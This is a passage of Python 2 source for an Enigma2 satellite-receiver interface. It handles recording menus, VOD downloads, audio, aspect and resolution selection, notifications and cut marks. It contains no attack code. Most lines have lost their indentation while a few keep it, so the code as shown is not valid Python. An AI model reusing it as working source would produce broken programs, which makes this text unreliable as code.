				Notifications.AddNotification(MessageBox, _('Sorry, it is only possible to record 2 channels at once'), MessageBox.TYPE_ERROR, timeout=5)
return
self.startInstantRecording(limitEvent=answer[1] in ('event', 'manualendtime') or False)
if answer[1] == 'manualduration':
self.changeDuration(len(self.recording) - 1)
elif answer[1] == 'manualendtime':
self.setEndtime(len(self.recording) - 1)
elif answer[1] == 'savetimeshift':
if self.isSeekable() and self.pts_eventcount != self.pts_currplaying:
InfoBarTimeshift.SaveTimeshift(self, timeshiftfile='pts_livebuffer_%s' % self.pts_currplaying)
else:
				Notifications.AddNotification(MessageBox, _('Timeshift will be saved at the end of the event!'), MessageBox.TYPE_INFO, timeout=5)
self.save_current_timeshift = True
config.timeshift.isRecording.value = True
elif answer[1] == 'savetimeshiftEvent':
InfoBarTimeshift.saveTimeshiftEventPopup(self)
elif answer[1].startswith('pts_livebuffer') is True:
InfoBarTimeshift.SaveTimeshift(self, timeshiftfile=answer[1])
elif answer[1] == 'downloadvod':
self.saveTimeshiftEventPopupActive = False
name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
url = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getPath()
if url:
import urllib2
from OPENDROID.OPD_panel import FileDownloadJob
from Screens.TaskView import JobView
					try:
						u = urllib2.urlopen(url)
						u.close()
					except:
						self.session.open(MessageBox, _('The URL to this image is not correct!'), type=MessageBox.TYPE_ERROR)
						return
file_name = config.usage.vod_path.value + '/' + name.replace(' ', '_') + '.mkv'
f = open(file_name, 'wb')
f.close()
job = FileDownloadJob(url, file_name, name.replace(' ', '_'))
job.afterEvent = 'close'
job_manager.AddJob(job)
job_manager.in_background = True
					self.session.open(MessageBox, _('Downloading started - VOD: ' + name.replace('_', ' ')), MessageBox.TYPE_INFO, timeout=5)
else:
					self.session.open(MessageBox, _('Downloading failed, try another VOD title'), MessageBox.TYPE_INFO, timeout=5)
if answer[1] != 'savetimeshiftEvent':
self.saveTimeshiftEventPopupActive = False
return
def setEndtime(self, entry):
if entry is not None and entry >= 0:
self.selectedEntry = entry
self.endtime = ConfigClock(default=self.recording[self.selectedEntry].end)
dlg = self.session.openWithCallback(self.TimeDateInputClosed, TimeDateInput, self.endtime)
dlg.setTitle(_('Please change the recording end time'))
return
def TimeDateInputClosed(self, ret):
if len(ret) > 1:
if ret[0]:
if self.recording[self.selectedEntry].end != ret[1]:
self.recording[self.selectedEntry].autoincrease = False
self.recording[self.selectedEntry].end = ret[1]
self.session.nav.RecordTimer.timeChanged(self.recording[self.selectedEntry])
def changeDuration(self, entry):
if entry is not None and entry >= 0:
self.selectedEntry = entry
self.session.openWithCallback(self.inputCallback, InputBox, title=_('How many minutes do you want to record for?'), text='5 ', maxSize=True, type=Input.NUMBER)
return
def addRecordingTime(self, entry):
if entry is not None and entry >= 0:
self.selectedEntry = entry
self.session.openWithCallback(self.inputAddRecordingTime, InputBox, title=_('How many minutes do you want add to the recording?'), text='5 ', maxSize=True, type=Input.NUMBER)
return
def inputAddRecordingTime(self, value):
if value:
print '[InfoBarGenerics] added', int(value), 'minutes for recording.'
entry = self.recording[self.selectedEntry]
if int(value) != 0:
entry.autoincrease = False
entry.end += 60 * int(value)
self.session.nav.RecordTimer.timeChanged(entry)
def inputCallback(self, value):
entry = self.recording[self.selectedEntry]
if value is not None:
print '[InfoBarGenerics] stopping recording after', int(value), 'minutes.'
if int(value) != 0:
entry.autoincrease = False
entry.end = int(time()) + 60 * int(value)
self.session.nav.RecordTimer.timeChanged(entry)
return
def isTimerRecordRunning(self):
identical = timers = 0
for timer in self.session.nav.RecordTimer.timer_list:
if timer.isRunning() and not timer.justplay:
timers += 1
if self.recording:
for x in self.recording:
if x.isRunning() and x == timer:
identical += 1
return timers > identical
def instantRecord(self, serviceRef = None):
self.SelectedInstantServiceRef = serviceRef
pirr = preferredInstantRecordPath()
if not findSafeRecordPath(pirr) and not findSafeRecordPath(defaultMoviePath()):
if not pirr:
pirr = ''
self.session.open(MessageBox, _('Missing ') + '\n' + pirr + '\n' + _('No HDD found or HDD not initialized!'), MessageBox.TYPE_ERROR)
return
if isStandardInfoBar(self):
			commonVOD = ((_('Download (remember to switch to a DVB-S2/T/T2/C channel)'), 'downloadvod'), (_('Add recording (stop after current event)'), 'event'))
common = ((_('Add recording (stop after current event)'), 'event'),
(_('Add recording (indefinitely)'), 'indefinitely'),
(_('Add recording (enter recording duration)'), 'manualduration'),
(_('Add recording (enter recording endtime)'), 'manualendtime'))
timeshiftcommon = ((_('Timeshift save recording (stop after current event)'), 'savetimeshift'), (_('Timeshift save recording (Select event)'), 'savetimeshiftEvent'))
else:
common = ()
commonVOD = ()
timeshiftcommon = ()
if self.isInstantRecordRunning():
title = _('A recording is currently in progress.\nWhat do you want to do?')
list = common + ((_('Change recording (duration)'), 'changeduration'), (_('Change recording (add time)'), 'addrecordingtime'), (_('Change recording (end time)'), 'changeendtime'))
list += ((_('Stop recording'), 'stop'),)
if config.usage.movielist_trashcan.value:
list += ((_('Stop and delete recording'), 'stopdelete'),)
if len(self.recording) > 1:
list += ((_('Stop all current recordings'), 'stopall'),)
if config.usage.movielist_trashcan.value:
list += ((_('Stop and delete all current recordings'), 'stopdeleteall'),)
if self.isTimerRecordRunning():
list += ((_('Stop timer recording'), 'timer'),)
elif self.session.nav.getCurrentlyPlayingServiceReference():
			isStreamService = self.session.nav.getCurrentlyPlayingServiceReference().toString().startswith('4097:')
			if isStreamService:
title = _('Start recording?')
list = commonVOD
else:
title = _('Start recording?')
list = common
if self.isTimerRecordRunning():
list += ((_('Stop timer recording'), 'timer'),)
if isStandardInfoBar(self) and self.timeshiftEnabled():
list = list + timeshiftcommon
if isStandardInfoBar(self):
list = list + ((_('Do not record'), 'no'),)
else:
return 0
if list:
self.session.openWithCallback(self.recordQuestionCallback, ChoiceBox, title=title, list=list)
else:
return 0
class InfoBarAudioSelection:
def __init__(self):
self["AudioSelectionAction"] = HelpableActionMap(self, "InfobarAudioSelectionActions",
{
"audioSelection": (self.audioSelection, _("Audio options...")),
"audio_key": (self.audio_key, _("Audio options...")),
"audioSelectionLong": (self.audioDownmixToggle, _("Toggle Digital downmix...")),
})
def audioSelection(self):
from Screens.AudioSelection import AudioSelection
self.session.openWithCallback(self.audioSelected, AudioSelection, infobar=self)
def audio_key(self):
from Screens.AudioSelection import AudioSelection
self.session.openWithCallback(self.audioSelected, AudioSelection, infobar=self)
def audioSelected(self, ret=None):
print "[infobar::audioSelected]", ret
def audioDownmixToggle(self, popup = True):
if SystemInfo["CanDownmixAC3"]:
if config.av.downmix_ac3.value:
message = _("Dolby Digital downmix is now") + " " + _("disabled")
print '[Audio] Dolby Digital downmix is now disabled'
config.av.downmix_ac3.setValue(False)
else:
config.av.downmix_ac3.setValue(True)
message = _("Dolby Digital downmix is now") + " " + _("enabled")
print '[Audio] Dolby Digital downmix is now enabled'
if popup:
Notifications.AddPopup(text = message, type = MessageBox.TYPE_INFO, timeout = 5, id = "DDdownmixToggle")
def audioDownmixOn(self):
if not config.av.downmix_ac3.value:
self.audioDownmixToggle(False)
def audioDownmixOff(self):
if config.av.downmix_ac3.value:
self.audioDownmixToggle(False)
class InfoBarSubserviceSelection:
def __init__(self):
self["SubserviceSelectionAction"] = HelpableActionMap(self, "InfobarSubserviceSelectionActions",
{
"GreenPressed": (self.GreenPressed),
"subserviceSelection": (self.subserviceSelection),
})
self["SubserviceQuickzapAction"] = HelpableActionMap(self, "InfobarSubserviceQuickzapActions",
{
"nextSubservice": (self.nextSubservice, _("Switch to next sub service")),
"prevSubservice": (self.prevSubservice, _("Switch to previous sub service"))
}, -1)
self["SubserviceQuickzapAction"].setEnabled(False)
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evUpdatedEventInfo: self.checkSubservicesAvail
})
self.onClose.append(self.__removeNotifications)
self.bsel = None
def GreenPressed(self):
if not config.plisettings.Subservice.value:
self.openTimerList()
else:
service = self.session.nav.getCurrentService()
subservices = service and service.subServices()
if not subservices or subservices.getNumberOfSubservices() == 0:
if fileExists("/usr/lib/enigma2/python/Plugins/Extensions/CustomSubservices/plugin.pyo"):
serviceRef = self.session.nav.getCurrentlyPlayingServiceReference()
subservices = self.getAvailableSubservices(serviceRef)
if not subservices or len(subservices) == 0:
self.openPluginBrowser()
else:
self.subserviceSelection()
else:
self.openPluginBrowser()
else:
self.subserviceSelection()
def openPluginBrowser(self):
try:
from Screens.PluginBrowser import PluginBrowser
self.session.open(PluginBrowser)
except:
pass
def __removeNotifications(self):
self.session.nav.event.remove(self.checkSubservicesAvail)
def checkSubservicesAvail(self):
service = self.session.nav.getCurrentService()
subservices = service and service.subServices()
if not subservices or subservices.getNumberOfSubservices() == 0:
self["SubserviceQuickzapAction"].setEnabled(False)
def nextSubservice(self):
self.changeSubservice(+1)
def prevSubservice(self):
self.changeSubservice(-1)
def changeSubservice(self, direction):
service = self.session.nav.getCurrentService()
subservices = service and service.subServices()
n = subservices and subservices.getNumberOfSubservices()
if n and n > 0:
selection = -1
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
idx = 0
while idx < n:
if subservices.getSubservice(idx).toString() == ref.toString():
selection = idx
break
idx += 1
if selection != -1:
selection += direction
if selection >= n:
selection=0
elif selection < 0:
selection=n-1
newservice = subservices.getSubservice(selection)
if newservice.valid():
del subservices
del service
self.session.nav.playService(newservice, False)
def subserviceSelection(self):
service = self.session.nav.getCurrentService()
subservices = service and service.subServices()
self.bouquets = self.servicelist.getBouquetList()
n = subservices and subservices.getNumberOfSubservices()
selection = 0
if n and n > 0:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
tlist = []
idx = 0
while idx < n:
i = subservices.getSubservice(idx)
if i.toString() == ref.toString():
selection = idx
tlist.append((i.getName(), i))
idx += 1
if self.bouquets and len(self.bouquets):
keys = ["red", "blue", "", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" ] + [""] * n
if config.usage.multibouquet.value:
tlist = [(_("Quick zap"), "quickzap", service.subServices()), (_("Add to bouquet"), "CALLFUNC", self.addSubserviceToBouquetCallback), ("--", "")] + tlist
else:
tlist = [(_("Quick zap"), "quickzap", service.subServices()), (_("Add to favourites"), "CALLFUNC", self.addSubserviceToBouquetCallback), ("--", "")] + tlist
selection += 3
else:
tlist = [(_("Quick zap"), "quickzap", service.subServices()), ("--", "")] + tlist
keys = ["red", "", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" ] + [""] * n
selection += 2
self.session.openWithCallback(self.subserviceSelected, ChoiceBox, title=_("Please select a sub service..."), list = tlist, selection = selection, keys = keys, skin_name = "SubserviceSelection")
def subserviceSelected(self, service):
del self.bouquets
if not service is None:
if isinstance(service[1], str):
if service[1] == "quickzap":
from Screens.SubservicesQuickzap import SubservicesQuickzap
self.session.open(SubservicesQuickzap, service[2])
else:
self["SubserviceQuickzapAction"].setEnabled(True)
self.session.nav.playService(service[1], False)
def addSubserviceToBouquetCallback(self, service):
if not service is None:
if len(service) > 1 and isinstance(service[1], eServiceReference):
self.selectedSubservice = service
if self.bouquets is None:
cnt = 0
else:
cnt = len(self.bouquets)
if cnt > 1: # show bouquet list
self.bsel = self.session.openWithCallback(self.bouquetSelClosed, BouquetSelector, self.bouquets, self.addSubserviceToBouquet)
elif cnt == 1: # add to only one existing bouquet
self.addSubserviceToBouquet(self.bouquets[0][1])
self.session.open(MessageBox, _("Service has been added to the favourites."), MessageBox.TYPE_INFO)
else:
self.session.open(MessageBox, _("Service cant been added to the favourites."), MessageBox.TYPE_INFO)
def bouquetSelClosed(self, confirmed):
self.bsel = None
del self.selectedSubservice
if confirmed:
self.session.open(MessageBox, _("Service has been added to the selected bouquet."), MessageBox.TYPE_INFO)
def addSubserviceToBouquet(self, dest):
self.servicelist.addServiceToBouquet(dest, self.selectedSubservice[1])
if self.bsel:
self.bsel.close(True)
else:
del self.selectedSubservice
def openTimerList(self):
self.session.open(TimerEditList)
from Components.Sources.HbbtvApplication import HbbtvApplication
gHbbtvApplication = HbbtvApplication()
class InfoBarRedButton:
def __init__(self):
self["RedButtonActions"] = HelpableActionMap(self, "InfobarRedButtonActions",
{
"activateRedButton": (self.activateRedButton, _("Red button...")),
})
self["HbbtvApplication"] = gHbbtvApplication
self.onHBBTVActivation = [ ]
self.onRedButtonActivation = [ ]
self.onReadyForAIT = [ ]
self.__et = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evHBBTVInfo: self.detectedHbbtvApplication,
iPlayableService.evUpdatedInfo: self.updateInfomation
})
def updateAIT(self, orgId=0):
for x in self.onReadyForAIT:
try:
x(orgId)
except Exception, ErrMsg:
print ErrMsg
#self.onReadyForAIT.remove(x)
def updateInfomation(self):
try:
self["HbbtvApplication"].setApplicationName("")
self.updateAIT()
except Exception, ErrMsg:
pass
def detectedHbbtvApplication(self):
service = self.session.nav.getCurrentService()
info = service and service.info()
try:
for x in info.getInfoObject(iServiceInformation.sHBBTVUrl):
print x
if x[0] in (-1, 1):
self.updateAIT(x[3])
self["HbbtvApplication"].setApplicationName(x[1])
break
except Exception, ErrMsg:
pass
def activateRedButton(self):
service = self.session.nav.getCurrentService()
info = service and service.info()
if info and info.getInfoString(iServiceInformation.sHBBTVUrl) != "":
for x in self.onHBBTVActivation:
x()
elif False: # TODO: other red button services
for x in self.onRedButtonActivation:
x()
class InfoBarTimerButton:
def __init__(self):
self["TimerButtonActions"] = HelpableActionMap(self, "InfobarTimerButtonActions",
{
"timerSelection": (self.timerSelection, _("Timer selection...")),
})
def timerSelection(self):
from Screens.TimerEdit import TimerEditList
self.session.open(TimerEditList)
class InfoBarAspectSelection:
STATE_HIDDEN = 0
STATE_ASPECT = 1
STATE_RESOLUTION = 2
def __init__(self):
self["AspectSelectionAction"] = HelpableActionMap(self, "InfobarAspectSelectionActions",
{
"aspectSelection": (self.ExGreen_toggleGreen, _("Aspect list...")),
})
self.__ExGreen_state = self.STATE_HIDDEN
def ExGreen_doAspect(self):
print "do self.STATE_ASPECT"
self.__ExGreen_state = self.STATE_ASPECT
self.aspectSelection()
def ExGreen_doResolution(self):
print "do self.STATE_RESOLUTION"
self.__ExGreen_state = self.STATE_RESOLUTION
self.resolutionSelection()
def ExGreen_doHide(self):
print "do self.STATE_HIDDEN"
self.__ExGreen_state = self.STATE_HIDDEN
def ExGreen_toggleGreen(self, arg=""):
print self.__ExGreen_state
if self.__ExGreen_state == self.STATE_HIDDEN:
print "self.STATE_HIDDEN"
self.ExGreen_doAspect()
elif self.__ExGreen_state == self.STATE_ASPECT:
print "self.STATE_ASPECT"
self.ExGreen_doResolution()
elif self.__ExGreen_state == self.STATE_RESOLUTION:
print "self.STATE_RESOLUTION"
self.ExGreen_doHide()
def aspectSelection(self):
selection = 0
tlist= [(_("Resolution"), "resolution"),("--", ""),(_("4_3_letterbox"), "0"), (_("4_3_panscan"), "1"), (_("16_9"), "2"), (_("16_9_always"), "3"), (_("16_10_letterbox"), "4"), (_("16_10_panscan"), "5"), (_("16_9_letterbox"), "6")]
		selection = len(tlist) - 1  # preselect the last entry (same effect as the original loop)
keys = ["green", "", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" ]
self.session.openWithCallback(self.aspectSelected, ChoiceBox, title=_("Please select an aspect ratio..."), list = tlist, selection = selection, keys = keys)
def aspectSelected(self, aspect):
if not aspect is None:
if isinstance(aspect[1], str):
if aspect[1] == "":
self.ExGreen_doHide()
elif aspect[1] == "resolution":
self.ExGreen_toggleGreen()
else:
from Components.AVSwitch import AVSwitch
iAVSwitch = AVSwitch()
iAVSwitch.setAspectRatio(int(aspect[1]))
self.ExGreen_doHide()
else:
self.ExGreen_doHide()
return
class InfoBarResolutionSelection:
def __init__(self):
return
def resolutionSelection(self):
f = open("/proc/stb/vmpeg/0/xres", "r")
xresString = f.read()
f.close()
f = open("/proc/stb/vmpeg/0/yres", "r")
yresString = f.read()
f.close()
if getBoxType().startswith('azbox'):
fpsString = '50000'
else:
try:
f = open("/proc/stb/vmpeg/0/framerate", "r")
fpsString = f.read()
f.close()
except:
print"[InfoBarResolutionSelection] Error open /proc/stb/vmpeg/0/framerate !!"
fpsString = '50000'
xres = int(xresString, 16)
yres = int(yresString, 16)
fps = int(fpsString)
fpsFloat = float(fps)
fpsFloat = fpsFloat/1000
# do we need a new sorting with this way here?
# or should we disable some choices?
choices = []
if os.path.exists("/proc/stb/video/videomode_choices"):
f = open("/proc/stb/video/videomode_choices")
values = f.readline().replace("\n", "").replace("pal ", "").replace("ntsc ", "").split(" ", -1)
for x in values:
				entry = (x.replace('i50', 'i@50hz').replace('i60', 'i@60hz').replace('p23', 'p@23.976hz').replace('p24', 'p@24hz').replace('p25', 'p@25hz').replace('p29', 'p@29hz').replace('p30', 'p@30hz').replace('p50', 'p@50hz'), x)
choices.append(entry)
f.close()
selection = 0
tlist = []
tlist.append((_("Exit"), "exit"))
tlist.append((_("Auto(not available)"), "auto"))
tlist.append((_("Video: ") + str(xres) + "x" + str(yres) + "@" + str(fpsFloat) + "hz", ""))
tlist.append(("--", ""))
if choices != []:
for x in choices:
tlist.append(x)
keys = ["green", "yellow", "blue", "", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" ]
mode = open("/proc/stb/video/videomode").read()[:-1]
print mode
for x in range(len(tlist)):
if tlist[x][1] == mode:
selection = x
self.session.openWithCallback(self.ResolutionSelected, ChoiceBox, title=_("Please select a resolution..."), list = tlist, selection = selection, keys = keys)
def ResolutionSelected(self, Resolution):
if not Resolution is None:
if isinstance(Resolution[1], str):
if Resolution[1] == "exit" or Resolution[1] == "" or Resolution[1] == "auto":
self.ExGreen_toggleGreen()
if Resolution[1] != "auto":
f = open("/proc/stb/video/videomode", "w")
f.write(Resolution[1])
f.close()
#from enigma import gMainDC
#gMainDC.getInstance().setResolution(-1, -1)
self.ExGreen_doHide()
else:
self.ExGreen_doHide()
return
class InfoBarVmodeButton:
def __init__(self):
self["VmodeButtonActions"] = HelpableActionMap(self, "InfobarVmodeButtonActions",
{
"vmodeSelection": (self.vmodeSelection, _("Letterbox zoom")),
})
def vmodeSelection(self):
self.session.open(VideoMode)
class VideoMode(Screen):
def __init__(self,session):
Screen.__init__(self, session)
self["videomode"] = Label()
self["actions"] = NumberActionMap( [ "InfobarVmodeButtonActions" ],
{
"vmodeSelection": self.selectVMode
})
self.Timer = eTimer()
self.Timer.callback.append(self.quit)
self.selectVMode()
def selectVMode(self):
policy = config.av.policy_43
if self.isWideScreen():
policy = config.av.policy_169
idx = policy.choices.index(policy.value)
idx = (idx + 1) % len(policy.choices)
policy.value = policy.choices[idx]
self["videomode"].setText(policy.value)
self.Timer.start(1000, True)
def isWideScreen(self):
from Components.Converter.ServiceInfo import WIDESCREEN
service = self.session.nav.getCurrentService()
info = service and service.info()
return info.getInfo(iServiceInformation.sAspect) in WIDESCREEN
def quit(self):
self.Timer.stop()
self.close()
class InfoBarAdditionalInfo:
def __init__(self):
self["RecordingPossible"] = Boolean(fixed=harddiskmanager.HDDCount() > 0)
self["TimeshiftPossible"] = self["RecordingPossible"]
self["ExtensionsAvailable"] = Boolean(fixed=1)
# TODO: these properties should be queried from the input device keymap
self["ShowTimeshiftOnYellow"] = Boolean(fixed=0)
self["ShowAudioOnYellow"] = Boolean(fixed=0)
self["ShowRecordOnRed"] = Boolean(fixed=0)
class InfoBarNotifications:
def __init__(self):
self.onExecBegin.append(self.checkNotifications)
Notifications.notificationAdded.append(self.checkNotificationsIfExecing)
self.onClose.append(self.__removeNotification)
def __removeNotification(self):
Notifications.notificationAdded.remove(self.checkNotificationsIfExecing)
def checkNotificationsIfExecing(self):
if self.execing:
self.checkNotifications()
def checkNotifications(self):
notifications = Notifications.notifications
if notifications:
n = notifications[0]
del notifications[0]
cb = n[0]
if n[3].has_key("onSessionOpenCallback"):
n[3]["onSessionOpenCallback"]()
del n[3]["onSessionOpenCallback"]
if cb:
dlg = self.session.openWithCallback(cb, n[1], *n[2], **n[3])
elif not Notifications.current_notifications and n[4] == "ZapError":
if n[3].has_key("timeout"):
del n[3]["timeout"]
n[3]["enable_input"] = False
dlg = self.session.instantiateDialog(n[1], *n[2], **n[3])
self.hide()
dlg.show()
self.notificationDialog = dlg
eActionMap.getInstance().bindAction('', -maxint - 1, self.keypressNotification)
else:
dlg = self.session.open(n[1], *n[2], **n[3])
# remember that this notification is currently active
d = (n[4], dlg)
Notifications.current_notifications.append(d)
dlg.onClose.append(boundFunction(self.__notificationClosed, d))
def closeNotificationInstantiateDialog(self):
if hasattr(self, "notificationDialog"):
self.session.deleteDialog(self.notificationDialog)
del self.notificationDialog
eActionMap.getInstance().unbindAction('', self.keypressNotification)
def keypressNotification(self, key, flag):
if flag:
self.closeNotificationInstantiateDialog()
def __notificationClosed(self, d):
Notifications.current_notifications.remove(d)
class InfoBarServiceNotifications:
def __init__(self):
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evEnd: self.serviceHasEnded
})
def serviceHasEnded(self):
# print "service end!"
try:
self.setSeekState(self.SEEK_STATE_PLAY)
except:
pass
class InfoBarCueSheetSupport:
CUT_TYPE_IN = 0
CUT_TYPE_OUT = 1
CUT_TYPE_MARK = 2
CUT_TYPE_LAST = 3
ENABLE_RESUME_SUPPORT = False
def __init__(self, actionmap = "InfobarCueSheetActions"):
self["CueSheetActions"] = HelpableActionMap(self, actionmap,
{
"jumpPreviousMark": (self.jumpPreviousMark, _("Jump to previous marked position")),
"jumpNextMark": (self.jumpNextMark, _("Jump to next marked position")),
"toggleMark": (self.toggleMark, _("Toggle a cut mark at the current position"))
}, prio=1)
self.cut_list = [ ]
self.is_closing = False
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evStart: self.__serviceStarted,
iPlayableService.evCuesheetChanged: self.downloadCuesheet,
})
def __serviceStarted(self):
if self.is_closing:
return
# print "new service started! trying to download cuts!"
self.downloadCuesheet()
self.resume_point = None
if self.ENABLE_RESUME_SUPPORT:
for (pts, what) in self.cut_list:
if what == self.CUT_TYPE_LAST:
last = pts
break
else:
last = getResumePoint(self.session)
if last is None:
return
# only resume if at least 10 seconds ahead, or <10 seconds before the end.
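		# (PTS ticks run at 90 kHz, so 900000 ticks = 10 seconds)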
seekable = self.__getSeekable()
if seekable is None:
return # Should not happen?
length = seekable.getLength() or (None,0)
# print "seekable.getLength() returns:", length
# Hmm, this implies we don't resume if the length is unknown...
if (last > 900000) and (not length[1] or (last < length[1] - 900000)):
self.resume_point = last
l = last / 90000
if "ask" in config.usage.on_movie_start.value or not length[1]:
Notifications.AddNotificationWithCallback(self.playLastCB, MessageBox, _("Do you want to resume this playback?") + "\n" + (_("Resume position at %s") % ("%d:%02d:%02d" % (l/3600, l%3600/60, l%60))), timeout=30, default="yes" in config.usage.on_movie_start.value)
elif config.usage.on_movie_start.value == "resume":
Notifications.AddNotificationWithCallback(self.playLastCB, MessageBox, _("Resuming playback"), timeout=2, type=MessageBox.TYPE_INFO)
def playLastCB(self, answer):
if answer == True and self.resume_point:
self.doSeek(self.resume_point)
self.hideAfterResume()
def hideAfterResume(self):
if isinstance(self, InfoBarShowHide):
self.hide()
def __getSeekable(self):
service = self.session.nav.getCurrentService()
if service is None:
return None
return service.seek()
def cueGetCurrentPosition(self):
seek = self.__getSeekable()
if seek is None:
return None
r = seek.getPlayPosition()
if r[0]:
return None
return long(r[1])
def cueGetEndCutPosition(self):
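		# best effort: returns the PTS where the last cut-OUT region begins, or False if the cut list has none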
ret = False
isin = True
for cp in self.cut_list:
if cp[1] == self.CUT_TYPE_OUT:
if isin:
isin = False
ret = cp[0]
elif cp[1] == self.CUT_TYPE_IN:
isin = True
return ret
def jumpPreviousNextMark(self, cmp, start=False):
current_pos = self.cueGetCurrentPosition()
if current_pos is None:
return False
mark = self.getNearestCutPoint(current_pos, cmp=cmp, start=start)
if mark is not None:
pts = mark[0]
else:
return False
self.doSeek(pts)
return True
def jumpPreviousMark(self):
# we add 5 seconds, so if the play position is <5s after
# the mark, the mark before will be used
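		# (5*90000 PTS ticks = 5 seconds at the 90 kHz PTS clock)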
self.jumpPreviousNextMark(lambda x: -x-5*90000, start=True)
def jumpNextMark(self):
if not self.jumpPreviousNextMark(lambda x: x-90000):
self.doSeek(-1)
def getNearestCutPoint(self, pts, cmp=abs, start=False):
# can be optimized
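		# returns the cut-list entry closest to pts according to cmp(); an IN mark resets
		# the search, so marks before the most recent IN are disregarded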
beforecut = True
nearest = None
bestdiff = -1
instate = True
if start:
bestdiff = cmp(0 - pts)
if bestdiff >= 0:
nearest = [0, False]
for cp in self.cut_list:
if beforecut and cp[1] in (self.CUT_TYPE_IN, self.CUT_TYPE_OUT):
beforecut = False
if cp[1] == self.CUT_TYPE_IN: # Start is here, disregard previous marks
diff = cmp(cp[0] - pts)
if start and diff >= 0:
nearest = cp
bestdiff = diff
else:
nearest = None
bestdiff = -1
if cp[1] == self.CUT_TYPE_IN:
instate = True
elif cp[1] == self.CUT_TYPE_OUT:
instate = False
elif cp[1] in (self.CUT_TYPE_MARK, self.CUT_TYPE_LAST):
diff = cmp(cp[0] - pts)
if instate and diff >= 0 and (nearest is None or bestdiff > diff):
nearest = cp
bestdiff = diff
return nearest
def toggleMark(self, onlyremove=False, onlyadd=False, tolerance=5*90000, onlyreturn=False):
current_pos = self.cueGetCurrentPosition()
if current_pos is None:
# print "not seekable"
return
nearest_cutpoint = self.getNearestCutPoint(current_pos)
if nearest_cutpoint is not None and abs(nearest_cutpoint[0] - current_pos) < tolerance:
if onlyreturn:
return nearest_cutpoint
if not onlyadd:
self.removeMark(nearest_cutpoint)
elif not onlyremove and not onlyreturn:
self.addMark((current_pos, self.CUT_TYPE_MARK))
if onlyreturn:
return None
def addMark(self, point):
insort(self.cut_list, point)
self.uploadCuesheet()
self.showAfterCuesheetOperation()
def removeMark(self, point):
self.cut_list.remove(point)
self.uploadCuesheet()
self.showAfterCuesheetOperation()
def showAfterCuesheetOperation(self):
if isinstance(self, InfoBarShowHide):
self.doShow()
def __getCuesheet(self):
service = self.session.nav.getCurrentService()
if service is None:
return None
return service.cueSheet()
def uploadCuesheet(self):
cue = self.__getCuesheet()
if cue is None:
# print "upload failed, no cuesheet interface"
return
cue.setCutList(self.cut_list)
def downloadCuesheet(self):
cue = self.__getCuesheet()
if cue is None:
# print "download failed, no cuesheet interface"
self.cut_list = [ ]
else:
self.cut_list = cue.getCutList()
class InfoBarSummary(Screen):
skin = """
<screen position="0,0" size="132,64">
<widget source="global.CurrentTime" render="Label" position="62,46" size="82,18" font="Regular;16" >
<convert type="ClockToText">WithSeconds</convert>
</widget>
<widget source="session.RecordState" render="FixedLabel" text=" " position="62,46" size="82,18" zPosition="1" >
<convert type="ConfigEntryTest">config.usage.blinking_display_clock_during_recording,True,CheckSourceBoolean</convert>
<convert type="ConditionalShowHide">Blink</convert>
</widget>
<widget source="session.CurrentService" render="Label" position="6,4" size="120,42" font="Regular;18" >
<convert type="ServiceName">Name</convert>
</widget>
<widget source="session.Event_Now" render="Progress" position="6,46" size="46,18" borderWidth="1" >
<convert type="EventTime">Progress</convert>
</widget>
</screen>"""
# for picon: (path="piconlcd" will use LCD picons)
# <widget source="session.CurrentService" render="Picon" position="6,0" size="120,64" path="piconlcd" >
# <convert type="ServiceName">Reference</convert>
# </widget>
class InfoBarSummarySupport:
def __init__(self):
pass
def createSummary(self):
return InfoBarSummary
class InfoBarMoviePlayerSummary(Screen):
skin = """
<screen position="0,0" size="132,64">
<widget source="global.CurrentTime" render="Label" position="62,46" size="64,18" font="Regular;16" halign="right" >
<convert type="ClockToText">WithSeconds</convert>
</widget>
<widget source="session.RecordState" render="FixedLabel" text=" " position="62,46" size="64,18" zPosition="1" >
<convert type="ConfigEntryTest">config.usage.blinking_display_clock_during_recording,True,CheckSourceBoolean</convert>
<convert type="ConditionalShowHide">Blink</convert>
</widget>
<widget source="session.CurrentService" render="Label" position="6,4" size="120,42" font="Regular;18" >
<convert type="ServiceName">Name</convert>
</widget>
<widget source="session.CurrentService" render="Progress" position="6,46" size="56,18" borderWidth="1" >
<convert type="ServicePosition">Position</convert>
</widget>
</screen>"""
def __init__(self, session, parent):
Screen.__init__(self, session, parent = parent)
self["state_summary"] = StaticText("")
self["speed_summary"] = StaticText("")
self["statusicon_summary"] = MultiPixmap()
self.onShow.append(self.addWatcher)
self.onHide.append(self.removeWatcher)
def addWatcher(self):
self.parent.onChangedEntry.append(self.selectionChanged)
def removeWatcher(self):
self.parent.onChangedEntry.remove(self.selectionChanged)
def selectionChanged(self, state_summary, speed_summary, statusicon_summary):
self["state_summary"].setText(state_summary)
self["speed_summary"].setText(speed_summary)
self["statusicon_summary"].setPixmapNum(int(statusicon_summary))
class InfoBarMoviePlayerSummarySupport:
def __init__(self):
pass
def createSummary(self):
return InfoBarMoviePlayerSummary
class InfoBarTeletextPlugin:
def __init__(self):
self.teletext_plugin = None
for p in plugins.getPlugins(PluginDescriptor.WHERE_TELETEXT):
self.teletext_plugin = p
if self.teletext_plugin is not None:
self["TeletextActions"] = HelpableActionMap(self, "InfobarTeletextActions",
{
"startTeletext": (self.startTeletext, _("View teletext..."))
})
else:
print "no teletext plugin found!"
def startTeletext(self):
self.teletext_plugin and self.teletext_plugin(session=self.session, service=self.session.nav.getCurrentService())
class InfoBarSubtitleSupport(object):
def __init__(self):
object.__init__(self)
self["SubtitleSelectionAction"] = HelpableActionMap(self, "InfobarSubtitleSelectionActions",
{
"subtitleSelection": (self.subtitleSelection, _("Subtitle selection...")),
})
self.selected_subtitle = None
if isStandardInfoBar(self):
self.subtitle_window = self.session.instantiateDialog(SubtitleDisplay)
self.subtitle_window.setAnimationMode(0)
else:
from Screens.InfoBar import InfoBar
